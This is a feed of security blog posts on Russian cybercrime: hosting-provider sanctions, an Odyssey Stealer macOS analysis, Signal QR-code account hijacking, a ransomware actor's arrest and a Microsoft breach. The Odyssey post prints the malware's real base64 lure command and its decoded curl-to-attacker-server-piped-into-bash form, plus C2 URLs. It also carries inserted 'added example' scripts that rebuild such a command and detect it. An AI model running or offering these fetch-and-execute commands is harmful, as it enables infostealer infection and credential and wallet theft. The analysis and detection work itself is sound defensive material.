Russian Hackers – Gridinsoft Blog
https://gridinsoft.com/blogs
Welcome to the Gridinsoft Blog, where we share posts about security solutions to keep you, your family and business safe.
Feed last built: Fri, 21 Nov 2025 07:07:32 +0000 (en-US)

Media Land Sanctioned: US, UK, and Australia Crush Russian “Bulletproof” Hosting Empire
https://gridinsoft.com/blogs/media-land-hosting-sanctions-by-usa-uk-australia/
Fri, 21 Nov 2025 06:41:12 +0000

The post Media Land Sanctioned: US, UK, and Australia Crush Russian “Bulletproof” Hosting Empire appeared first on Gridinsoft Blog.

November 20, 2025 — In a rare display of international cooperation that cybercriminals probably didn’t see coming, the United States, United Kingdom, and Australia have joined forces to smash one of Russia’s most notorious cybercrime enablers. And no, we’re not talking about just another ransomware gang—this time, they went after the landlords.

Based in sunny 🙃 St. Petersburg, Russia, Media Land LLC has been running what the industry politely calls “bulletproof hosting” services. For those unfamiliar with the term, “bulletproof hosting” is essentially server infrastructure designed with one goal in mind: making it incredibly difficult for law enforcement to shut you down. Think of it as the cybercrime equivalent of a bunker—except instead of storing canned goods, you’re hosting ransomware operations.

According to the U.S. Treasury Department, Media Land has been the hosting provider of choice for some of the cybercrime world’s greatest hits, including LockBit, BlackSuit, and Play ransomware gangs. Their infrastructure has also been used to launch DDoS attacks against U.S. companies and critical infrastructure. In other words, if cybercrime were a movie, Media Land would be the studio lot where all the villains shoot their scenes.

The Man Behind the Curtain: “Yalishanda”

Running this digital criminal empire is Alexander Volosovik, known on underground forums by his rather whimsical alias “Yalishanda” (one has to wonder if that username was chosen because “CyberCrimeBoss69” was already taken). Volosovik has been busy advertising his services on cybercriminal forums, providing servers, and troubleshooting for ransomware operators—basically running a twisted version of customer support. Notably, security researcher Brian Krebs investigated bulletproof hosting operations back in July 2019, highlighting how these services have long enabled cybercriminals to operate with impunity.

Photo: Alexander Alexandrovich VOLOSOVIK (Yalishanda), at right

“Need a server that law enforcement can’t touch? Call Yalishanda! We’ve got you covered!” might as well have been his tagline.

Working alongside Volosovik are several accomplices, including Kirill Zatolokin, who handled payments and coordination (every criminal enterprise needs a good accountant), and Yulia Pankova, who managed Volosovik’s legal issues and finances. Because even cybercriminals have paperwork, apparently.

The Price Tag: £14.7 Billion and Counting

UK Foreign Secretary Yvette Cooper didn’t mince words when announcing the sanctions. Cyber-attacks cost British businesses a staggering £14.7 billion in 2024 alone—that’s 0.5% of the entire UK GDP. To put that in perspective, that’s roughly the GDP of a small country, just… evaporating into the digital void thanks to ransomware and other cyber nastiness.

Cooper’s statement painted a bleak but accurate picture: “Putin has turned Russia into a safe haven for these malicious cyber criminals, cultivating a dark criminal ecosystem with deep ties to the Kremlin.” Translation: Russia has become the Florida of cybercrime—a place where criminals retire and continue their work with impunity. This isn’t the first time we’ve seen Russia’s cybercrime ecosystem intersect with geopolitical conflicts, particularly in the context of the ongoing war in Ukraine.

Aeza Group: When Plan A Gets Sanctioned, Try Plan B (and C, and D…)

In a plot twist worthy of a spy novel, the sanctions also target Aeza Group LLC, another bulletproof hosting provider that was already sanctioned back in July 2025. But here’s where it gets interesting: instead of calling it quits, Aeza’s leadership decided to play a game of corporate whack-a-mole.

After the initial sanctions, Aeza initiated what the Treasury delicately calls “a rebranding strategy.” They created Hypercore Ltd. in the UK, established front companies in Serbia (Smart Digital Ideas DOO) and Uzbekistan (Datavice MCHJ), and appointed a new director, Maksim Makarov, to make key decisions about evading sanctions. Because apparently, when you’re already sanctioned for enabling cybercrime, the logical next step is… more crime.

The U.S. Treasury’s response? “Thanks for the org chart!” They’ve now sanctioned the entire network, including the new players.

What Does “Bulletproof” Even Mean?

For the uninitiated, bulletproof hosting providers offer specialized services designed to resist takedown attempts. This typically includes:

  • Ignoring abuse complaints: That email saying “your server is hosting ransomware” goes straight to spam
  • Hosting in jurisdictions with lax enforcement: Preferably where local authorities either can’t or won’t cooperate with international law enforcement
  • Quick infrastructure migration: If one server gets seized, the operation moves to another faster than you can say “probable cause”
  • Anonymized payment methods: Cryptocurrency preferred, questions discouraged

Media Land and Aeza Group weren’t just hosting websites—they were providing the entire infrastructure that allows cybercriminals to operate with something approaching impunity. It’s like renting out a getaway car, but the car can teleport to a different country if the police get too close.

So what do these sanctions actually do? In practical terms:

  1. Asset freezes: All property and assets of the designated individuals and entities in the U.S., UK, and Australia are now blocked
  2. Transaction bans: U.S., UK, and Australian persons are prohibited from doing business with these entities
  3. Reputational damage: Being on a sanctions list is terrible for business (even criminal business)
  4. Secondary sanctions risk: Financial institutions that continue dealing with these entities risk sanctions themselves

The coordinated nature of these sanctions is particularly significant. When three major economies simultaneously slam the door on your operation, finding financial institutions willing to process your payments becomes… complicated.

Here’s the delicious irony: bulletproof hosting providers sell their services based on being untouchable. “We’re so secure, so hidden, so protected that authorities can’t touch us!” And yet, here we are, with detailed Treasury Department press releases listing names, aliases, corporate structures, and asset freezes.

Turns out “bulletproof” has its limits when three countries’ financial systems simultaneously decide you’re persona non grata.

The National Cyber Security Centre, along with its international counterparts, has released new guidance to help organizations defend against malicious activities enabled by bulletproof hosting providers. Because while sanctions can disrupt operations, education and defense are equally important.

Will this completely stop ransomware attacks? Of course not. Cybercrime is a multi-billion-dollar industry with plenty of entrepreneurs eager to fill any gaps in the market. But it does make life significantly harder for major operations, disrupts established infrastructure, and sends a clear message: the “bulletproof” promise comes with an expiration date.

The Bigger Picture

What makes this action particularly noteworthy is the coordination. Cybercrime is inherently international—attackers in Russia can target victims in the UK using infrastructure in a dozen different countries. Fighting it requires a similarly international response. We’ve seen similar coordinated efforts before, such as when international authorities successfully dismantled major Russian botnets, proving that collaboration can yield results.

The fact that the U.S., UK, and Australia managed to coordinate sanctions, share intelligence, and act simultaneously shows that when it comes to cybercrime infrastructure, the good guys are learning to play the same global game as the criminals.

As for Alexander “Yalishanda” Volosovik and his associates, they’re probably discovering that being on everyone’s sanctions list is decidedly bad for business. Even in Russia’s cybercrime-friendly ecosystem, being this toxic makes it hard to find banks willing to hold your money or partners willing to work with you. While Media Land focused on hosting ransomware infrastructure, other Russian cybercriminals have been involved in more direct attacks, showing the diverse nature of the threat landscape.

A full list of those added to the sanctions list today is as follows:

  • MEDIA LAND LLC
  • ML.CLOUD LLC
  • Alexander Alexandrovich VOLOSOVIK
  • Yulia Vladimirovna PANKOVA
  • Kirill Andreevich ZATOLOKIN
  • Andrei Valerevich KOZLOV
  • AEZA GROUP LLC

Odyssey Stealer: Russian ‘Love Trump’ Malware Replaces Ledger Live Crypto Wallet App
https://gridinsoft.com/blogs/odyssey-stealer-macos-malware/
Wed, 11 Jun 2025 03:13:58 +0000

The post Odyssey Stealer: Russian ‘Love Trump’ Malware Replaces Ledger Live Crypto Wallet App appeared first on Gridinsoft Blog.

A new macOS malware campaign is targeting users through social engineering, masquerading as legitimate Cloudflare security verification. The Odyssey Stealer represents a significant escalation in Mac-targeted cybercrime, combining deceptive web pages with AppleScript-based data theft capabilities.

Analysis of the malware reveals intriguing geopolitical elements, with persistence mechanisms using file names like com.love.russia.plist and staging directories named lovemrtrump – suggesting potential connections to Russian threat actors with apparent political motivations. Most concerning is the malware’s ability to replace legitimate cryptocurrency applications like Ledger Live with trojaned versions, compromising hardware wallet security and stealing private keys during transactions.

The Deception Chain: From Fake Verification to Full Compromise

The attack begins when users are redirected to seemingly legitimate domains like macosx-apps[.]com (macosxappstore[.]com, appmacosx[.]com) displaying convincing Cloudflare-styled verification pages. These pages present users with an “Unusual Web Traffic Detected” warning and request manual verification through terminal commands.

Screenshot: macosx-apps fake Cloudflare verification page

The fake verification page instructs users to:

  1. Press Command + Space to open Spotlight
  2. Type “Terminal” and press Return
  3. Copy and paste a provided command
  4. Execute the command to “verify” their legitimacy

What appears to be a simple verification text is actually a base64-encoded malicious command:
            echo "Y3VybCAtcyBodHRwOi8vb2R5c3NleTEudG86MzMzMy9kP3U9b2N0b2JlciB8IG5vaHVwIGJhc2ggJg==" | base64 -d | bash

When decoded, this reveals the true payload: curl -s hxxp[:]//odyssey1[.]to:3333/d?u=october | nohup bash & – a command that downloads and executes an AppleScript stealer from the attacker’s server.
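As an added example (not code from the original post), the shell functions below take a pasted “verification” one-liner of this shape, decode it without ever handing it to a shell, and flag the fetch-and-pipe-into-a-shell pattern. The sample command is constructed here with a reserved example domain rather than the real server, and extract_b64, decode_payload and classify_payload are this example's own names:

```bash
# Added example, not code from the original post: decode a pasted
# "verification" one-liner WITHOUT executing it, then flag the
# fetch-and-pipe-into-a-shell shape. The sample command is constructed
# with a reserved example domain; the function names are this example's own.

# Constructed sample in the same shape as the command in the post.
SAMPLE_PLAIN='curl -s http://c2.example.invalid:3333/d?u=october | nohup bash &'
SAMPLE_B64=$(printf '%s' "$SAMPLE_PLAIN" | base64 | tr -d '\n')
SAMPLE_CMD="echo \"$SAMPLE_B64\" | base64 -d | bash"
# A harmless one-liner for comparison (decodes to "hello world").
BENIGN_CMD='echo "aGVsbG8gd29ybGQ=" | base64 -d'

# Pull the quoted base64 blob out of an `echo "<b64>" | base64 -d | ...` chain.
# Returns 1 when the command does not have that shape.
extract_b64() {
    case "$1" in
        *'echo "'*) ;;
        *) return 1 ;;
    esac
    rest=${1#*echo \"}
    printf '%s\n' "${rest%%\"*}"
}

# Decode the blob to plain text. Nothing here is passed to a shell.
# (Older macOS base64 builds spell the flag -D instead of -d.)
decode_payload() {
    b64=$(extract_b64 "$1") || return 1
    printf '%s' "$b64" | base64 -d 2>/dev/null
}

# Verdict: "download-and-execute" when the decoded text fetches remote
# content with curl/wget and pipes it into sh/bash/zsh (optionally via
# nohup), "review-manually" for any other base64-wrapped text, and
# "not-base64-wrapped" when there is nothing to decode.
classify_payload() {
    decoded=$(decode_payload "$1") || { echo "not-base64-wrapped"; return 0; }
    if printf '%s\n' "$decoded" |
        grep -Eq '(curl|wget)[^|]*\|[[:space:]]*(nohup[[:space:]]+)?(ba|z)?sh'; then
        echo "download-and-execute"
    else
        echo "review-manually"
    fi
}

printf 'decoded: %s\nverdict: %s\n' \
    "$(decode_payload "$SAMPLE_CMD")" "$(classify_payload "$SAMPLE_CMD")"
```

Pass the suspicious one-liner as the argument to classify_payload; a download-and-execute verdict means the “verification” is an intrusion attempt, and the decoded text is what goes into the incident ticket. The regex only covers the quoted-echo form shown in the post; unquoted blobs, nested decoders and interpreters other than sh/bash/zsh would need extra patterns.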

Odyssey Stealer attack flow (diagram, summarized as text):
  1. User redirected to a fake Cloudflare page on macosx-apps[.]com, macosxappstore[.]com or appmacosx[.]com
  2. Fake verification: “Unusual Traffic” warning with Terminal instructions
  3. Base64 command: the user copies and executes it in Terminal
  4. Script download from odyssey1[.]to:3333
  5. AppleScript payload runs
  6. Data collection: browser credentials, wallets, system info
  7. Data exfiltration: ZIP upload to the odyssey1[.]to server
  8. Persistence setup: LaunchDaemon com.love.russia.plist
  9. App replacement: malicious Ledger Live installation
  10. Ongoing control: botnet binary execution loop
High risk: complete system compromise, credential theft, crypto wallet access. Persistence: survives reboots, runs continuously, replaces legitimate applications. Detection: monitor /tmp/lovemrtrump/, network connections to odyssey1[.]to, and LaunchDaemon processes.

Advanced AppleScript Capabilities: Beyond Basic Info-Stealing

The Odyssey Stealer distinguishes itself through obfuscation and comprehensive data collection capabilities. The malware employs randomized function names (like f7220708984353234618 and v4763105019481279311) to evade signature-based detection while systematically harvesting sensitive information.

Targeted Data Collection

The stealer focuses on high-value targets across multiple categories:

  • Browser Credentials: Targets Safari, Chrome, Brave, Edge, Vivaldi, Opera, and Firefox, extracting cookies, form history, and stored passwords
  • Cryptocurrency Wallets: Specifically hunts for Electrum, Coinomi, Exodus, Ledger Live, MetaMask, and numerous other wallet applications
  • System Information: Collects detailed hardware and software profiles using system_profiler
  • Personal Files: Copies documents from Desktop and Documents folders with extensions like .txt, .pdf, .docx, .wallet, .key
  • Keychain Access: Steals macOS Keychain databases containing stored passwords and certificates
  • Apple Notes: Extracts and formats Notes data, potentially revealing personal information and security details

Persistence and Privilege Escalation

The malware establishes multiple persistence mechanisms to maintain long-term access:

  • LaunchDaemon Installation: Creates /Library/LaunchDaemons/com.love.russia.plist to ensure automatic execution at boot
  • Botnet Binary: Downloads and installs a secondary payload (~/.init) that runs continuously
  • Social Engineering for Sudo: Prompts users with fake “Application Helper” dialogs to obtain administrator passwords
  • Application Replacement: Can replace legitimate applications like Ledger Live with malicious versions

Technical Analysis: Obfuscation and Anti-Detection

The Odyssey Stealer demonstrates anti-analysis techniques that set it apart from typical commodity info-stealers like Lumma. Unlike traditional malware that relies on compiled binaries, this threat leverages AppleScript’s legitimate system access to fly under the radar.

Key Technical Features

  • Variable obfuscation: random 19-digit function/variable names; impact: evades signature detection
  • Error handling: comprehensive try-catch blocks; impact: prevents crashes, maintains stealth
  • File exclusions: skips .DS_Store, Cache and temp files; impact: reduces detection, optimizes exfiltration
  • Cleanup routines: removes temporary files post-exfiltration; impact: eliminates forensic evidence
  • Retry mechanism: 10 upload attempts with 60s delays; impact: ensures successful data theft

Cryptocurrency Focus: The Primary Target

Like many modern stealers, Odyssey specifically targets cryptocurrency assets with precision similar to Meta Infostealer campaigns. The malware maintains an extensive list of over 180 browser extension IDs for cryptocurrency wallets and DeFi applications.

High-priority targets include:

  • MetaMask: The most common Ethereum wallet extension
  • BNB Chain Wallet: Binance Smart Chain access
  • Hardware Wallet Interfaces: Ledger Live, Trezor Suite
  • Desktop Wallets: Electrum, Exodus, Atomic Wallet
  • Exchange Applications: Binance desktop, TonKeeper

The malware’s application replacement capability is particularly concerning. When enabled, it can download and install malicious versions of legitimate applications like Ledger Live, potentially compromising hardware wallet interactions and stealing private keys during transactions.

The Ledger Live Trojan: Hardware Wallet Compromise

One of the most dangerous features of Odyssey Stealer is its ability to replace the legitimate Ledger Live application with a malicious version. This supply-chain attack works by:

  • Application Termination: Killing any running Ledger Live processes
  • File Replacement: Removing the legitimate /Applications/Ledger Live.app
  • Malicious Installation: Downloading and installing a trojaned version from hxxp[:]//odyssey1[.]to/otherassets/ledger.zip
  • Seamless Operation: The fake application appears identical to users while capturing private keys and transaction data

This attack vector is particularly insidious because users trust hardware wallets like Ledger devices for their enhanced security. However, if the companion software is compromised, attackers can potentially intercept private keys, seed phrases, and transaction details even from hardware-secured wallets. The trojaned Ledger Live app could capture sensitive information during device setup, firmware updates, or transaction signing processes.

Indicators of Compromise (IoCs)

Network Indicators

  • C2 Server: odyssey1[.]to:3333
  • Download URL: hxxp[:]//odyssey1[.]to:3333/d?u=october
  • Fake Domain: macosx-apps[.]com, macosxappstore[.]com, appmacosx[.]com
  • Asset Download: hxxp[:]//odyssey1[.]to/otherassets/ledger.zip
  • Botnet Binary: hxxp[:]//odyssey1[.]to/otherassets/botnet

File System Artifacts

  • Staging Directory: /tmp/lovemrtrump/
  • Exfiltration Archive: /tmp/out.zip
  • Persistence: /Library/LaunchDaemons/com.love.russia.plist
  • User Files: ~/.username, ~/.pwd, ~/.init, ~/.start
  • Data Collection: /tmp/lovemrtrump/finder/, /tmp/lovemrtrump/deskwallets/

Detection and Removal Guide

If you suspect your Mac has been compromised by Odyssey Stealer, immediate action is required to prevent ongoing data theft and financial losses.

Immediate Detection Steps

  1. Check for Active Processes:
            ps aux | grep -E "(odyssey|lovemrtrump|\.init)"
            launchctl list | grep "com.love.russia"
  2. Inspect File System:
            ls -la /tmp/lovemrtrump/
            ls -la /Library/LaunchDaemons/com.love.russia.plist
            ls -la ~/.init ~/.start ~/.username ~/.pwd
  3. Check Network Connections:
            # -n prints numeric addresses, so match the C2 port rather than the hostname
            netstat -an | grep "\.3333"
            lsof -i -n -P | grep ":3333"
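The file-system part of these checks is easier to repeat, and to run against a mounted disk image or a test fixture instead of the live Mac, when it is a function that takes the root and home directory as parameters. The script below is an added example, not the post's own tooling: the function names are this example's own, the artifact paths are the ones the post lists, and the Ledger Live signature check assumes Apple's codesign and launchctl tools are present (it skips itself elsewhere):

```bash
# Added example, not code from the original post: look for the Odyssey
# artifacts listed in the post. ROOT and HOME_DIR are parameters so the
# same function works on a live host, a mounted image or a fixture.
# Function names are this example's own; paths are the post's IoCs.

# System-wide artifacts, relative to ROOT.
ODYSSEY_SYSTEM_PATHS="tmp/lovemrtrump tmp/out.zip tmp/ledger.zip tmp/starter Library/LaunchDaemons/com.love.russia.plist"
# Per-user artifacts, relative to HOME_DIR.
ODYSSEY_HOME_PATHS=".init .start .username .pwd"

# Print each artifact that exists, then the total count on the last line.
scan_odyssey_artifacts() {
    root=${1:-/}
    home_dir=${2:-$HOME}
    found=0
    for rel in $ODYSSEY_SYSTEM_PATHS; do
        if [ -e "$root/$rel" ]; then
            echo "FOUND: $root/$rel"
            found=$((found + 1))
        fi
    done
    for rel in $ODYSSEY_HOME_PATHS; do
        if [ -e "$home_dir/$rel" ]; then
            echo "FOUND: $home_dir/$rel"
            found=$((found + 1))
        fi
    done
    echo "$found"
}

# Just the number, for use in scripts and alerting.
count_odyssey_artifacts() {
    scan_odyssey_artifacts "$1" "$2" | tail -n 1
}

# Live-macOS-only checks: the launchd label, and the Ledger Live bundle's
# signature. codesign --verify fails on a tampered or unsigned bundle; the
# Authority/TeamIdentifier lines must be compared with a known-good install,
# because a re-signed trojan can still pass --verify.
check_live_mac_host() {
    if command -v launchctl >/dev/null 2>&1 &&
        launchctl list 2>/dev/null | grep -q 'com.love.russia'; then
        echo "FOUND: launchd job com.love.russia"
    fi
    app="/Applications/Ledger Live.app"
    if command -v codesign >/dev/null 2>&1 && [ -d "$app" ]; then
        if codesign --verify --deep --strict "$app" 2>/dev/null; then
            echo "Ledger Live.app: signature verifies; check signer below"
        else
            echo "Ledger Live.app: SIGNATURE FAILED, reinstall from the vendor"
        fi
        codesign -dv "$app" 2>&1 | grep -E 'Authority=|TeamIdentifier='
    fi
}

# Set ODYSSEY_SCAN=1 to run against the live system; otherwise this file
# only defines the functions and can be sourced by a larger triage script.
if [ "${ODYSSEY_SCAN:-0}" = "1" ]; then
    scan_odyssey_artifacts / "$HOME"
    check_live_mac_host
fi
```

A non-zero count, a present launchd job, or a Ledger Live bundle whose signature fails or whose signer differs from a known-good install means the host should be treated as compromised and the application removed and reinstalled from the vendor's site, not repaired in place.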
            

Manual Removal Process

Warning: Manual removal requires administrative privileges and careful execution. For comprehensive cleanup, we recommend using professional security tools.

  1. Stop Malicious Processes:
            sudo launchctl unload /Library/LaunchDaemons/com.love.russia.plist
            sudo pkill -f "\.init"
            sudo pkill -f "lovemrtrump"
  2. Remove Persistence Mechanisms:
            sudo rm -f /Library/LaunchDaemons/com.love.russia.plist
            rm -f ~/.init ~/.start ~/.username ~/.pwd
  3. Clean Temporary Files:
            sudo rm -rf /tmp/lovemrtrump/
            sudo rm -f /tmp/out.zip
            sudo rm -f /tmp/ledger.zip
            sudo rm -f /tmp/starter
  4. Verify Application Integrity:
            # Check if Ledger Live was replaced
            ls -la "/Applications/Ledger Live.app"
            # Reinstall from official source if suspicious
            

Post-Infection Security Measures

After removing the malware, implement these critical security steps:

Immediate Actions

  • Change All Passwords: Update passwords for all accounts, especially financial and cryptocurrency services
  • Review Financial Accounts: Check bank statements, credit reports, and cryptocurrency wallet balances
  • Enable 2FA: Activate two-factor authentication on all sensitive accounts
  • Monitor Credit Reports: Set up fraud alerts with credit bureaus

Browser Security

  • Clear Browser Data: Remove all saved passwords, cookies, and form data
  • Reinstall Extensions: Remove and reinstall all browser extensions, especially wallet-related ones
  • Update Browsers: Ensure all browsers are running the latest versions
  • Review Permissions: Audit browser extension permissions and remove unnecessary access

Cryptocurrency Security

  • Create New Wallets: Generate new wallet addresses and transfer funds from potentially compromised wallets
  • Hardware Wallet Reset: If using hardware wallets, perform a full reset and restore from backup
  • Verify Applications: Reinstall all cryptocurrency applications from official sources
  • Monitor Transactions: Set up alerts for all cryptocurrency accounts and monitor for unauthorized activity

The Broader Threat Landscape

The Odyssey Stealer represents a concerning evolution in macOS-targeted cybercrime. Unlike previous campaigns that relied on social engineering or software vulnerabilities, this threat combines legitimate system tools with deception to bypass traditional security measures.

This attack shares characteristics with other recent campaigns targeting Mac users, including RustBucket malware and various cross-platform stealers. The trend toward AppleScript-based attacks suggests cybercriminals are adapting their tactics to exploit macOS users’ trust in system dialogs and terminal commands.

The campaign’s focus on cryptocurrency theft aligns with broader industry trends. As traditional banking security improves, attackers increasingly target decentralized finance (DeFi) platforms and personal cryptocurrency holdings, which often lack the same fraud protection mechanisms as traditional financial institutions.

Geopolitical Implications: The Russia Connection

The malware’s internal artifacts reveal potential geopolitical motivations. The persistence mechanism installs itself as com.love.russia.plist in the system’s LaunchDaemons directory, while staging stolen data in a folder named lovemrtrump. These naming conventions suggest the campaign may originate from Russian-affiliated threat actors with apparent political sentiments targeting Western cryptocurrency users.

The combination of Russian nomenclature and cryptocurrency theft capabilities aligns with patterns observed in other state-sponsored or politically motivated cybercrime operations. The specific targeting of hardware wallet applications like Ledger Live suggests a deep understanding of Western cryptocurrency infrastructure and user behavior patterns.

Conclusion

The Odyssey Stealer’s distinctive characteristics – from its Russian-themed persistence mechanisms (com.love.russia.plist, lovemrtrump directories) to its specific targeting of hardware wallet applications like Ledger Live – suggest a coordinated campaign with potential geopolitical motivations. The ability to replace legitimate cryptocurrency applications with trojaned versions represents a particularly dangerous evolution in crypto-targeted malware, as it undermines the security assumptions users make about hardware wallet safety.

Mac users must remain vigilant against these evolving threats, particularly those involving terminal commands or system-level access requests. The Ledger Live trojan functionality is especially concerning, as it targets users who have invested in hardware security solutions, potentially compromising their most secure cryptocurrency storage methods.

As cryptocurrency adoption continues to grow, we can expect similar campaigns targeting wallet applications and blockchain-related services. The key to protection lies in maintaining skepticism toward unsolicited security prompts, implementing comprehensive security measures, and regularly verifying the integrity of cryptocurrency applications. Users should always download applications directly from official sources and be suspicious of any unexpected application updates or reinstallation requests.

The Odyssey Stealer serves as a stark reminder that the intersection of geopolitics and cybercrime continues to evolve, with threat actors leveraging technical capabilities to target high-value cryptocurrency assets while potentially advancing broader political agendas.

Signal Linked Devices Abused by Russian Intelligence
https://gridinsoft.com/blogs/signal-linked-devices-hack/
Fri, 21 Feb 2025 11:55:42 +0000

The post Signal Linked Devices Abused by Russian Intelligence appeared first on Gridinsoft Blog.

A new fraudulent campaign to hijack Signal accounts has been detected. Attackers trick victims into scanning a QR code that authorizes the scammers’ device. Once authorized, the attacker receives all of the victim’s correspondence from that point on and can also download the message history for the last 45 days.

Multiple Russia-Aligned Threat Actors Actively Targeting Signal Messenger

Google’s Threat Intelligence Group discovered a fraudulent campaign targeting Signal users. Several Russia-aligned threat actors are actively targeting messenger accounts, used by individuals of interest to Russian intelligence services. This surge in activity appears to be driven by wartime demands to access sensitive communications, particularly within government and military circles.

Screenshot: fake page with QR code

In brief, attackers exploit Signal’s “linked devices” feature, tricking victims into scanning malicious QR codes that link their Signal accounts to adversary-controlled devices. This allows real-time message interception without needing full-device compromise. While Ukraine remains the primary target of these attacks, there are growing concerns that these tactics will be used globally.

Technical Details of Signal Linked Devices Hack

The attack method primarily exploits Signal’s “linked devices” feature, which is designed to allow users to connect additional devices to their account. Attackers generate malicious QR codes that, when scanned, add an adversary-controlled instance to the victim’s account. From that moment, messages are delivered to both the victim and the attacker simultaneously. This allows for persistent surveillance.

Russian-linked groups employ various phishing techniques to distribute these malicious QR codes. Some campaigns disguise them as legitimate Signal group invites. However, they redirect users to compromised URLs that execute the linking process.

For example, UNC5792, a threat actor tied to Russian intelligence, modifies legitimate Signal group invite pages by replacing the standard redirection code with a link that initiates device pairing. Instead of joining a group, victims unknowingly grant attackers access to their private messages.

Another group, UNC4221, has developed a specialized Signal phishing kit. It mimics official military applications, such as the Ukrainian Armed Forces’ Kropyva artillery guidance system. This kit either embeds malicious QR codes within phishing pages or redirects users to fake device-linking instructions, further increasing the likelihood of successful compromise.

Screenshot: fake Kropyva page hosted at “teneta.add-group[.]site”

Beyond QR code phishing, Russian cyber actors also employ malware to exfiltrate Signal database files from compromised Windows and Android devices. APT44 has deployed WAVESIGN, a Windows Batch script that extracts messages from Signal databases and uploads them via Rclone.

Meanwhile, malware like Infamous Chisel targets Android devices, searching for and exfiltrating Signal’s database files. Other groups, including Turla and UNC1151, have used PowerShell scripts and command-line utilities to steal Signal messages from compromised systems.

What’s Wrong With QR Codes?

Unfortunately, QR codes present several security risks, primarily due to their inherent opacity. Users cannot see where they lead until they are scanned. Attackers exploit this by replacing legitimate QR codes with malicious ones. They do this either physically (e.g., placing stickers over real codes) or digitally (e.g., swapping images in online resources). Users often scan and approve QR codes without scrutiny, making them an attractive attack vector.

Additionally, Signal and other messengers should strengthen their security measures by adding more explicit warnings during the device-linking process. The average user is not well-versed in cybersecurity, and small friction points in the authentication process could prevent inadvertent compromises. A simple “Are you sure?” prompt is not enough. For example, users should be required to type “YES” in capital letters or perform additional verification steps to ensure they understand the implications of linking a new device.

How To Stay Safe

To avoid falling victim to such scams, always verify the source of a QR code before scanning it. If you are linking a device to Signal, ensure that you initiate the process yourself through the app’s official settings rather than scanning codes from external sources. Be particularly wary of QR codes received via messages, emails, or websites that claim to be from Signal or trusted contacts.

Ultimately, the best defense against these attacks is vigilance. Attackers rely on social engineering and user complacency to succeed. By fostering greater awareness and caution when scanning QR codes, users can significantly reduce their risk of compromise.

Wazawaka Hacker Arrested in Kaliningrad, Russia
https://gridinsoft.com/blogs/wazawaka-hacker-arrested/
Mon, 02 Dec 2024 20:30:58 +0000

The post Wazawaka Hacker Arrested in Kaliningrad, Russia appeared first on Gridinsoft Blog.

Russian authorities have arrested the infamous hacker Mikhail Pavlovich Matveev, widely known by his alias, Wazawaka. His involvement allegedly helped three ransomware gangs extort over $200 million in ransom payments. The U.S. State Department has offered a $10 million reward for information leading to his capture.

Wazawaka a.k.a Mikhail Pavlovich Matveev Arrested in Russia

At just 32 years old, Matveev faces trial in Kaliningrad, Russia. According to local reports, he is accused of creating malicious software designed to encrypt sensitive data and files, which he allegedly used to target organizations and demand ransom payments in exchange for decryption keys.

The Russian Ministry of Internal Affairs stated that investigators have gathered sufficient evidence and that the case, with a prosecutor-approved indictment, has been submitted to the Central District Court of Kaliningrad. The information was confirmed by RIA Novosti, a Russian state-owned outlet, and by several social media sources.

Some channels claim that Wazawaka is currently out on bail after paying two fines and forfeiting a substantial part of his cryptocurrency holdings. That claim, however, rests on nothing more solid than posts on X/Twitter. In May 2023, the U.S. government charged him with a series of cyber-related crimes and offered a reward of up to $10 million for information leading to his capture.

Wazawaka mugshot

Mikhail Matveev faces charges in the United States for his alleged use of LockBit, Hive and Babuk ransomware to target thousands of victims both domestically and internationally. Since at least 2020, Matveev and his accomplices have reportedly attacked law enforcement agencies, hospitals, schools, government entities, and private organizations worldwide.

On May 16, 2023, the U.S. Department of Justice (DoJ) linked three global ransomware campaigns to Matveev, estimating the total demands at nearly $400 million and the payments by victims at up to $200 million.

“Babuk actors executed over 65 attacks against victims in the United States and around the world, issuing over $49 million in ransom demands and receiving as much as $13 million in ransom payments.”

“Matveev is charged with conspiring to transmit ransom demands, conspiring to damage protected computers, and intentionally damaging protected computers. If convicted, he faces over 20 years in prison.”
US DoJ on Wazawaka

In early 2024, a decryptor for Babuk ransomware was released to the public, so victims of that threat actor can now recover their files for free.

Matveev reportedly attacked a New Jersey police department and other government bodies while working as a LockBit ransomware affiliate. While affiliated with the Hive ransomware operation, he attacked a nonprofit behavioral healthcare organization, also in New Jersey.

Why so much fuss around a hacker?

Wazawaka is not just another hacker; he is one of the most notorious threat actors from Russia. Along with LockBitSupp and Maksim Yakubets, he became widely known after his mugshot appeared on the FBI's wanted list. Matveev was also the subject of one of Brian Krebs' investigations, which successfully doxxed him.

This extensive media coverage is matched by the hacker's own bold social media presence. He ran an X/Twitter account where he highlighted his daily activities and even his successful hacks. At some point he even started selling his own merchandise, though with doubtful success.

Wazawaka merchandise

For another part of the cybersecurity community, Mikhail Matveev is remembered as a particularly unscrupulous hacker: he attacked hospitals and schools with ransomware. Doing so was supposedly against the unwritten “code” of hacking groups back in the day, but that code did not bother him in the least.

Microsoft is Hacked, Again by Midnight Blizzard
https://gridinsoft.com/blogs/microsoft-hacked-again-midnight-blizzard/ (published Sat, 09 Mar 2024 10:08:13 +0000)

Microsoft has acknowledged being hacked for the second time this year by the same Russian state-sponsored group, Midnight Blizzard. The company confirms that the new breach is a consequence of the previous one: the attackers had gotten hold of authentication secrets.

Microsoft Hacked, Source Code Leaked

In its 8-K filing with the SEC, Microsoft links the latest intrusion to the one uncovered in January 2024. The Russian threat actor known as Nobelium/Midnight Blizzard broke into Microsoft systems around late November 2023 and stayed inside until January, eventually gaining access to the emails of executives and to certain authentication material. It turns out the attackers walked away with some of those authentication secrets even after being discovered.

In the latest attack, Midnight Blizzard used these stolen secrets to get into Microsoft's internal network once again. The same 8-K filing discloses that the hackers gained, or at least attempted to gain, access using the stolen keys. Among the targeted systems are source code repositories and some internal systems. Microsoft warns that unauthorized access may recur, which means the company does not know the exact scale of the secrets leak.


“The threat actor’s ongoing attack is characterized by a sustained, significant commitment of the threat actor’s resources, coordination, and focus. Our active investigations of the threat actor’s activities are ongoing, findings of our investigations will continue to evolve, and further unauthorized access may occur.”
Microsoft, in its 8-K filing

One fortunate thing is that customer-facing systems and customer data were not compromised. This is plausible, as the earlier attack concentrated on top-tier executives, who rarely have direct access to customer data. And it is a big relief: had data leaked from Azure, Outlook or other cloud services, the scale of follow-on attacks could have been tremendous. Still, there is no excuse for a company of this size to fall victim like this.

Who is Midnight Blizzard?

Nobelium, also tracked as APT29 and Cozy Bear, or Midnight Blizzard in Microsoft's newer naming scheme, is a Russian state-sponsored threat actor. It focuses on cyber espionage and is attributed to Russia's Foreign Intelligence Service (SVR). The group is known for picking high-profile targets, particularly government agencies, military contractors and the like.

